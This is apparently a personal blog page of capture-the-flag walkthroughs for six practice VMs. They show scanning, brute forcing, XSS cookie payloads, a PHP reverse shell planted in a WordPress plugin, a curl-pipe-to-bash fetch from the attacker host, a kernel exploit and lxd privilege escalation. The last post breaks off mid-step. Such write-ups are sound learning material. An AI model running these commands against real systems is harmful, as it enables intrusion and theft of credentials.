Samdup
Resume
About me

Blog

Hire Me
No results found.

How I took down CoffeeAddicts Machine

Overview: 

Target Machine IP Address: 192.168.56.108
My Machine IP Address: 192.168.56.1

Mission:

Boot to Root

1. To get user flag
2. To get root flag
3. To get root access

Level: Easy/Medium  

Easy/Medium

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

sudo arp-scan --interface=vboxnet0 192.168.56.1/24

Target IP: 192.168.56.128

nmap -sC -sV -p- -Pn 192.168.56.128 -o nmap.log
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 fc:13:6a:6b:9b:e3:68:18:24:a1:de:2b:28:1e:61:5f (RSA)
| 256 c1:34:94:94:71:71:9c:6e:83:a6:be:c9:2a:1b:3f:d7 (ECDSA)
|_ 256 9a:cc:ce:ce:b8:2f:08:bb:2b:99:b6:25:3f:ec:44:61 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1. HTTP (80/tcp)

I made an entry in my /etc/hosts as it is mention here. And then I visit the site url http://coffeeaddicts.thm/

Let’s view source code

Decrypt the string. If you are wondering why I assume the string is base64. Almost 99% of the time it is sure that the string ends with “==” is base64. Besides, you can use other tools to identify the string as well.

echo "VEhNe2ltX3RoZV9saXphcmRfa2luZ30gaHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1kUXc0dzlXZ1hjUQ==" | base64 -d

THM{im_the_lizard_king} https://www.youtube.com/watch?v=dQw4w9WgXcQ

I am not sure whether the string is just a bogus or it is a sub-directory. Let’s make a note of it and then evaluate the directories.

gobuster dir -u http://coffeeaddicts.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -o gobuster.log

dirsearch -u http://coffeeaddicts.thm -e .html,.php,.txt,.php.bak,.bak,.zip -w /usr/share/wordlists/dirb/common.txt -f

Yes, we found that there is a wordpress instance.   http://coffeeaddicts.thm/wordpress/

I know the username is gus (because it is showing under each articles and if you want to do it more technically then you can pass this string in the url http://coffeeaddicts.thm/wordpress/?author=1).  or you can use wpscan and try the following command

wpscan --url http://coffeeaddicts.thm/wordpress/ --plugins-detection aggressive -e u -o wpscan_u.log

By the way, looks like there is a password hint. However I must confess that I can’t make anything out of it.  That’s why I though I will first try with rockyou.txt for the password list and do a wpscan bruteforce.

It has be close to 50 minutes but I didn’t get anything. So I thought I will let it run while I do manual enumeration.

password: gusineedyouback

I tried my favourite technique that is to hide the content of the php-reverse-shell.php inside the 404.php however, this time I am not sure why but I couldn’t. Thanks to this, I now found a new way to hide the script i.e., I have hidden the script within the hello dolly plugin. Nevertheless, you should be careful that you are not suppose to override the comment of the plugin (which is existed there already in the plugin).

Yes, you need to modify the IP address on which you are going to receive the reverse connection from the Target Machine. I usually keep the default port number.

On Kali Machine (type the following command):

nc -lvp 1234

As soon as I activate the Hello Dolly Plugin…I got the reverse connection on Kali Machine

I see that there are two users…

Users:

badbyte 
gus

user flag: THM{s4v3_y0uR_Cr3d5_b0i}

I did cd badbyte and saw that .ssh contains private ssh private key but it is password protected. Therefore, I had to google and I found this article useful

sudo updatedb

locate ssh2john 
cp /usr/share/john/ssh2john.py .
python ssh2john.py id_rsa > id_rsa.hash

john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

john --show id_rsa.hash

Password: password

ssh badbyte@192.168.56.108 -i id_rsa

sudo -l

(root) /opt/BadByte/shell

sudo /opt/BadByte/shell       #remember the password is password 
bash 
cd /root 
cat root.txt

root flag: THM{im_the_shell_master}

That’s all guys 🙂

 

No Comments

How I took down Momentum

Overview: 

Target Machine IP Address: 192.168.56.127
My Machine IP Address: 192.168.56.1

Mission:

Boot to Root

1. To get root flag
2. To get root access

Level: Easy/Medium  

Easy/Medium

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

sudo arp-scan --interface=vboxnet0 192.168.56.1/24

Target IP: 192.168.56.127

nmap -sC -sV -p- -Pn 192.168.56.127 -o nmap.log
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5c:8e:2c:cc:c1:b0:3e:7c:0e:22:34:d8:60:31:4e:62 (RSA)
| 256 81:fd:c6:4c:5a:50:0a:27:ea:83:38:64:b9:8b:bd:c1 (ECDSA)
|_ 256 c1:8f:87:c1:52:09:27:60:5f:2e:2d:e0:08:03:72:c8 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Momentum | Index
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1. HTTP

Since it is running with Apache webserver. Let’s check what website is running on it.

Do you see the value of viewDetails ? Yes, I collect all the values and made a list and then ran a bruteforce (because I know from the nmap result and the box is also running SSH).  But it didn’t work.

demon
guard
angle
visor

Let’s check directories … (because after the bruteforce, I can’t proceed with anything; with the information in my hand.)

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 192.168.56.127 -o gobuster.log

dirsearch -u http://192.168.56.127 -e txt,html,php,bk -w /usr/share/wordlists/dirb/common.txt -f

http://192.168.56.127/js/main.js
function viewDetails(str) {

  window.location.href = "opus-details.php?id="+str;
}

/*
var CryptoJS = require("crypto-js");
var decrypted = CryptoJS.AES.decrypt(encrypted, "SecretPassphraseMomentum");
console.log(decrypted.toString(CryptoJS.enc.Utf8));
*/

When I see the window.location.href I am not sure about it and then I did a google and first link direct me to this site

It has helped me to confirm that I could use this function for the URL.

So let’s try that..

http://192.168.56.127/opus-details.php?id=1    # 1 is showing. I think we can perform XSS attack on it. Let's confirm it with by throwing my favorite exploit.

http://192.168.56.127/opus-details.php?id="><img src=x onerror=prompt(1);>
http://192.168.56.127/opus-details.php?id=%22%3E%3Cscript%3Edocument.write(document.cookie);%3C/script%3E
cookie=U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt

I found this program and I really like it. By the way, if you ran into little problem like if it is not running, then take the time to skill up your debugging skills. I didn’t face the challenge to do debugging.  Although I found simple online tools to do the task, I deliberately took the pain because I would like to little python.

#!/usr/bin/python3
import Crypto
from Cryptodome import Random
from Cryptodome.Cipher import AES
import base64
from hashlib import md5

BLOCK_SIZE = 16

def pad(data):
length = BLOCK_SIZE - (len(data) % BLOCK_SIZE)
return data + (chr(length)*length).encode()

def unpad(data):
return data[:-(data[-1] if type(data[-1]) == int else ord(data[-1]))]

def bytes_to_key(data, salt, output=48):
# extended from https://gist.github.com/gsakkis/4546068
assert len(salt) == 8, len(salt)
data += salt
key = md5(data).digest()
final_key = key
while len(final_key) < output:
key = md5(key + data).digest()
final_key += key
return final_key[:output]

def encrypt(message, passphrase):
salt = Random.new().read(8)
key_iv = bytes_to_key(passphrase, salt, 32+16)
key = key_iv[:32]
iv = key_iv[32:]
aes = AES.new(key, AES.MODE_CBC, iv)
return base64.b64encode(b"Salted__" + salt + aes.encrypt(pad(message)))

def decrypt(encrypted, passphrase):
encrypted = base64.b64decode(encrypted)
assert encrypted[0:8] == b"Salted__"
salt = encrypted[8:16]
key_iv = bytes_to_key(passphrase, salt, 32+16)
key = key_iv[:32]
iv = key_iv[32:]
aes = AES.new(key, AES.MODE_CBC, iv)
return unpad(aes.decrypt(encrypted[16:]))


password = "SecretPassphraseMomentum".encode()
ct_b64 = "U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt"

pt = decrypt(ct_b64, password)
print("pt", pt)

print("pt", decrypt(encrypt(pt, password), password))

auxerre-alienum##

I am not sure whether this could help but I am going to perform a brute force attack again with this box. By the way, I have these information under my belt.

demon
guard
angle
visor
auxerre-alienum##
auxerre
alienum
auxerre## 
alienum##

By the way guys, I just did some simple combination. If you following pure combination and permutation then of course the combination will grow (which I will have to do if the current list doesn’t provide us the answer)

Note: I had to struggle a little (wasted close to an hour) because of a stupid space.

hydra -vV -L list2.txt -P list2.txt 192.168.56.127 ssh

medusa -h 192.168.56.127 -U list2.txt -P list2.txt -M ssh

username: auxerre

password: auxerre-alienum##
Protocol: SSH
ssh auxerre@192.168.56.127

After this, I was not able to find anything through my usual manual checking so I uploaded linpeas.sh inside the target machine to automatically enumerate potential heads-up.  Yes, something caught my eyes.

Looks like redis-server is running on port number 6379.

Let me check it again.

ss -nstap

I must confess here that I have heard a lot about redis but never used on. So let me google for sometime.

To login (resource)

redis-cli -h 127.0.0.1 -p 6379 

help

help KEYS 

KEYS * 

get rootpass

Note: If you think how I was able to find the aforementioned information. I did try my luck as well used some Jungle knowledge.

I press help and then press tab and visit many commands and tried many things because as I told you redis is new to me. When you try KEYS, the terminal recommends to place pattern next to it. It made me feel like I am using grep pattern so I used *. I used to get just because I have been using get command to download files from FTP and few other protocols as well. Therefore, I used that. I know this may not sound logical however, I am going to surely visit this box again later. Just to evaluate myself with redis.

root password: m0mentum-al1enum##

That’s all guys… See you all in my next post 🙂 Happy weekend!

It is 00:27AM here, but not feeling like sleep. I am gonna watch a movie and will hit the sack then 🙂

 

No Comments

How I took down Troll

Overview: 

Target Machine IP Address: 172.16.96.129
My Machine IP Address: 172.16.96.1

Mission:

Boot to Root

1. To get root flag
2. To get root access

Level: Easy/Medium  

Easy/Medium

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

sudo arp-scan --interface=vmnet1 172.16.96.1/24

Target IP: 172.16.96.129

nmap -sC -sV -p- -Pn 172.16.96.129 -o nmap.log
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230) 
|_End of status
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
| 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
| 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_ 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry 
|_/secret

1. FTP 

ftp 172.16.96.129
username: anonymous 
password: anonymous
ls -lah 

get lol.pcap 
wireshark lol.pcap &

I spent almost 20 minutes to Follow my TCP streams (TCP or FTP). All of sudden I saw FTP-Data.

And guess what I found ?

sup3rs3cr3tdirlol

http://172.16.96.129/sup3rs3cr3tdirlol/

wget http://172.16.96.129/sup3rs3cr3tdirlol/roflmao

file roflmao

chmod +x roflmao 

./roflmao

This message is very interesting

Find address 0x0856BF to proceed

I through I need to go inside the binary and check the address 0x0856BF and find the corresponding (text) value. Therefore, I tried many different ways to read it.  (For example, xxd, strings, bless, gdb etc..)

Later I peeked other people’s walk-through, just for this case only (otherwise, it will defeat the purpose of my own learning provided I copy anything and everything). I see. It was nothing but my own misunderstanding.

2. HTTP

http://172.16.96.129/0x0856BF/

 

I did clean up the which_one_lol.txt.

I also add the troll, which_one_lol.txt, Pass.txt, all in my user list file which is which_one_lol.txt as well as password list i.e. Pass.txt

Content of which_one_log.txt

Content of Pass.txt

medusa -h 172.16.96.129 -U which_one_lol.txt -P Pass.txt -M ssh

 

username: overflow

password: Pass.txt 
Protocol : SSH (we got this from nmap scan result)

Then I upload the linpeas.sh to /tmp folder (I won’t write the command here because it is quite essential and simple)

I ran the command sh linpeas.sh

 

 

This machine really worth its name TROLL.

See this screenshot …

I got little time to perform this command (uname -a) and do some googling

searchsploit -m 37292      # m is nothing but mirroring or copy

I have uploaded the exploit code 37292.c to our target machine

To be honest, I need to first do

which gcc

To check whether gcc compiler is there before uploading however, I think it is alright as I found the gcc is running on the target machine

 gcc 37292.c -o exploit

./exploit 

id 
ls -l /root 

cat /root/proof.txt

 

Yes, I got root but I am not happy as I got logged out again. So, I have decided to find which is the culprit program and gonna take that out 🙂

Hopefully I could complete it before my friend leave the office because he has the key lol By the way, I started working this writeup around 5:30PM (because I need to do office work from 9 to 5).

Good morning guys, let’s resume we left out yesterday.

I was able to find the culprit. The system is running a program called lmao.py which is located in /opt.  By the way, while I walking to the office, I thought if I can’t find any crontab entry, I would go with pspy64 tool. Because I used this very tool and find some cronjob action in my previous few blogs.(You can also keep this in mind)

I tried to comment the crontab entry however, my favorite editor (vim) is giving me hard time for some reason. That’s why I have commented out the entire script in lmao.py which is just few lines.

After this, I just made my shell Interactive by

python3 -c "import pty; pty.spawn('bin/bash')";

export TERM=xterm

That’s all guys.. Wish you have a productive day ahead! Remember, sometimes break between the work and study is also necessary 🙂

 

 

 

 

 

 

 

 

No Comments

How I took down Funbox:2

Overview: 

Target Machine IP Address: 192.168.56.106  
My Machine IP Address: 192.168.56.1

Mission:

Boot to Root

1. To get root flag
2. To get root access

Level: Easy/Medium  

Enumeration (both manually and automating it)

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

sudo arp-scan --interface=vboxnet0 192.168.56.1/24

Target IP: 192.168.56.106

nmap -sC -sV -p- -Pn 192.168.56.106 -o nmap.log
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5e
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 anna.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 ariel.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 bud.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 cathrine.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 homer.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 jessica.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 john.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 marge.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 miriam.zip
| -r--r--r-- 1 ftp ftp 1477 Jul 25 2020 tom.zip
| -rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg
|_-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 zlatan.zip
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 f9:46:7d:fe:0c:4d:a9:7e:2d:77:74:0f:a2:51:72:51 (RSA)
| 256 15:00:46:67:80:9b:40:12:3a:0c:66:07:db:1d:18:47 (ECDSA)
|_ 256 75:ba:66:95:bb:0f:16:de:7e:7e:a1:7b:27:3b:b0:58 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_ Supported Methods: GET POST OPTIONS HEAD
| http-robots.txt: 1 disallowed entry 
|_/logs/

1. HTTP 

    1. gobuster: 
      1. gobuster dir -u 192.168.56.106 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log
    2. dirsearch: 
      1. dirsearch -u 192.168.56.106 -w /usr/share/seclists/Discovery/Web-Content/common.txt


3.  robots.txt

Result: Didn’t get anything useful information…

2. FTP

ftp 192.168.56.106 username: anonymouspassword: anonymous

I have downloaded the entire information available in the FTP account.

I would like to know what is inside the zip file but I do not want to check manually so prepared a bash onliner to do the task for me.

for i in $(ls -l | grep -i .zip | awk -F" " '{print $9}'); do unzip -l $i; done

I see, each zip file contains SSH key there. Let me extract it.

Ops..it is asking a password.. since I do not know about, I think we need to bruteforce it. However, I must admit that I don’t know how at this moment. So let me do some google search…

I like this article.

I do not want to generate hash for each file, so let me write a bash script for it …

for i in $(ls -l | grep -i .zip | awk -F” ” ‘{print $9}’); do zip2john $i > hash_$i.txt; done

Then let’s crack the hash using the rockyou.txt (dictionary attack)

for i in $(ls -l | grep -i .txt | awk -F" " '{print $9}'); do john --wordlist=/usr/share/wordlists/rockyou.txt $i; done

 

I must admit that since the output is not showing on the screen itself (which usually do, I had to use my Jungle knowledge here. Having said that, usually the many of the script’s output is usually stores at ~/. You can do a quick ls -lah ~)

cat ~/.john/john.log

 

Literally I read each gibberish lines to understand the keyword and if you don’t have the patience then use find command for the keyword cracked. That way, you will know which hash got cracked. In our case, it was the user tom.

cat ~/.john/john.pot

I am not sure why it is showing two passwords, however, since we have saved lot of time using the bash script. Let’s check those manually..

Ya, catwoman didn’t work but iubire

ssh tom@192.168.56.106 -i id_rsa

I tried sudo -l and used the above password and no luck lol (because if do id command, you will know that tom is in the sudo user list)

ls -lah  (I use this command, thought that there might be some kind of user flag)

I found this file .mysql_history, which hardly shows in a normal box.

username: tom 
password: 040xx11yy22!    # ignore 040, it looks like some ascii code like %20 for space.

For some reason, I am not able to use the above credential to login. So, I tried cd command and come to know that user tom is running with rbash.

python3 -c "import pty;pty.spawn('/bin/bash')" is my favourite command to bypass the rbash

Still the above credential didn’t work for me. I will have to find some other way. By the way, right now it is 6:39 AM and I am going to prepare breakfast and lunch (I bring lunchbox to the office :)). Will resume soon…

Just got back from the office and it is 7:30PM now

Method 1

username: (040)tom
password: (040)xx11yy22!       # ignore 040, it looks like some ascii code like %20 for space.

I look detail on what I found, there is 040 infront of tom as well. So I remove 040 from the password and I got the root!!

Method 2:    Through SUID Binary (pkexec)

source link:

Method 3:  Through LXD (You need to have Bridge or NAT connection for this method because it requires Internet for the lxd therefore, you might notice IP changes if you do ifconfig on your system)

Note: Credit goes to this blog and walkthrough

I have uploaded the linpeas.sh to my target machine. (You must know how to do this, because this step is trivial but very essential)

As always, I got a long report and I don’t want to bore you with the jargons so, will share few screenshots and please read only the highlight text (that will be more than enough)

Usually, it is very hard to show lxd in orange mode (which is big redflag in this screenshot), though I had solved a box leveraging lxd 🙂

On Kali Linux Machine:

wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine

chmod +x

sudo ./build-alpine

Note: It creates a file called alpine-v3.14-x86_64-20210630_0551.tar.gz

Transfer the file(alpine-v3.14-x86_64-20210630_0551.tar.gz) to our target machine (Funbox2)

Then do

lxd init

Note: it will ask couple of questions, apart from dir, I kept everything as it is because to be honest, I read good amount on privilege escalation of lxd.

If you do not do lxd init you will get the following error.  Because I like this write up however, the author didn’t mention about lxd init so, I have googled good amount of time for the solution and thanks to that, I learn couple of new things along the line 🙂  By the way,

Error: No storage pool found. Please create a new storage pool
lxc init image hacker -c security.privileged=true

lxc config device add hacker mydevice disk source=/ path=/mnt/root recursive=true

lxc start hacker

lxc exec hacker /bin/sh

cd /mnt/root/root
cat flag.txt

By the way, usually once I root the machine, I just delete the box from vm but I am going to do this box specially the lxd part and then going to delete it 🙂

That’s all guys.. Wish you have a pleasant day!!

 

No Comments

How I took down Lazysysadmin

Overview: 

Target Machine IP Address: 172.16.96.131  
My Machine IP Address: 172.16.96.1

Machine doesn't work with Virtualbox but Vmware

Mission:

Boot to Root

Level: Easy

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

sudo arp-scan --interface=vmnet1 172.16.96.1/24

Target IP: 172.16.96.131

nmap -sC -sV -p- -Pn 172.16.96.131 -o nmap.log
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
| 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
| 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_ 256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries 
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
| irc-info: 
| server: Admin.local
| users: 1
| servers: 1
| chans: 0
| lusers: 1
| lservers: 0
| source ident: nmap
| source host: 172.16.96.1
|_ error: Closing link: (nmap@172.16.96.1) [Client exited]
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h09m59s, deviation: 5h46m24s, median: 5h29m59s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: lazysysadmin
| NetBIOS computer name: LAZYSYSADMIN\x00
| Domain name: \x00
| FQDN: lazysysadmin
|_ System time: 2021-06-25T20:18:35+10:00
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
| 2.02

1. HTTP

I had tried robots.txt and tried everything that I could and couldn’t find anything concrete for time being, so let’s try another protocol

2. SMB

smbclient -L 172.16.96.131

smbclient '\\172.16.96.131\share$'

get deets.txt
cd wordpress
get wp-config.php
cat wp-config.php 
Database Name: wordpress
Database Username: Admin
Database Password: TogieMYSQL12345^^

cat deets.txt

Password:12345

and we got username togie from this link 172.16.96.131/wordpress

 

username: togie
Password:12345

Based on nmap result we got in the above step, we know that the box is running with SSH protocol.

ssh togie@172.16.96.131
sudo -l

It is jackpot!! Which means I can run any privilege command on the box …

sudo -i

 

No Comments

How I took down Funbox: 1

Overview: 

Target Machine IP Address: 192.168.56.105  
My Machine IP Address: 192.168.56.1

Mission:

Boot to Root

1. To get root flag
2. To get root access

Level: Easy/Medium  

linpeas.sh + ls -lah did wonder as always

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

sudo arp-scan --interface=vboxnet0 192.168.56.1/24

Target IP: 192.168.56.105

nmap -sC -sV -p- -Pn 192.168.56.105 -o nmap.log
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 3072 d2:f6:53:1b:5a:49:7d:74:8d:44:f5:46:e3:93:29:d3 (RSA)
| 256 a6:83:6f:1b:9c:da:b4:41:8c:29:f4:ef:33:4b:20:e0 (ECDSA)
|_ 256 a6:5b:80:03:50:19:91:66:b6:c3:98:b8:c4:4f:5c:bd (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry 
|_/secret/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://funbox.fritz.box/
33060/tcp open mysqlx?
| fingerprint-strings: 
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
| Invalid message"
|_ HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.91%I=7%D=6/27%Time=60D859D5%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp
SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers
SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2
SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI
SF:nvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01
SF:\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x
SF:05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"
SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000
SF:")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r
SF:(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  1. HTTP Port 80

It directs to http://funbox.fritz.box/ so I made an entry of this naming in /etc/hosts

sudo vim /etc/hosts

 

When I visit http://funbox.fritz.box/  It is showing a WordPress website.

I thought, let me first browse

http://funbox.fritz.box/robots.txt, I got the following..

Disallow: /secret/

It was a false alarm!!

Usually, most of the wordpress website, we will get the username by ?author=X  change X=1,2,3,4…

username: admin

username: joe

wpscan --url http://funbox.fritz.box --plugins-detection aggressive -e u,ap -o wpscan.log

Web Directory Searching

1. Using Gobuster

gobuster dir -u 192.168.56.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log

2. dirsearch  (you can do dirb and dirbuster as well)

dirsearch -u 192.168.56.105 -w /usr/share/seclists/Discovery/Web-Content/common.txt

I got nothing concrete yet

Let’s try brute force the password for the wordpress website.

 wpscan --url http://funbox.fritz.box/ -U users.txt -P /usr/share/wordlists/rockyou.txt -o wp-brute.log

We got website access using the following Credentials

Username: admin 
Password: iubire

ssh joe@192.168.56.105

Username: joe 
Password: 12345

Let me check the Privilege Escalation on this box…

Looks like machine got rbash restricted

You can use either one of the method to by pass rbash, from this link. 

I tried vi option and it worked. But I prefer this one.

python3 -c 'import pty;pty.spawn("/bin/bash")';     #to bypass the rbash restriction

Now let’s try linpeas.sh  (if you are new to the machine the following command doing two things in one step. 1. Downloading linpeas.sh from my machine and then running it on the target machine)

curl 192.168.56.1:8000/linpeas.sh | bash

 

 

Enumerate:

While linpeas.sh was working, I thought to enumerate some of those manually…

Guess what… When I do the cat mbox

Message from funny changed to

Hi Joe, the hidden backup.sh backups the entire webspace on and on. Ted, the new admin, test it in a long run.

Do you see the bold word? It sounds like the backup.sh script is running with some kind of cron job. (though I didn’t find any explicit cron job entry under joe’s account. Later I found funny has cron job which I will show in the later steps).

cat .backup.sh 
#!/bin/bash
tar -cf /home/funny/html.tar /var/www/html

Let’s verify our assumption by using pspy64 tool. (I downloaded all pspy versions and used pspy64. By the way, link is here)

Do you see, the backup.sh is running with UID=0, which means, it is running with root privilege. You don’t believe me? Here is the screenshot

Since this code is repeatedly executing(cron job), how about we put a reverse connection script or ssh-key so that from joe account we could log into funny ?

Method 1: With Reverse Connection

Although I tried to change the directory to /root and then from there I did spawn a shell, all I got was nothing but access to funny.

vim .backup.sh

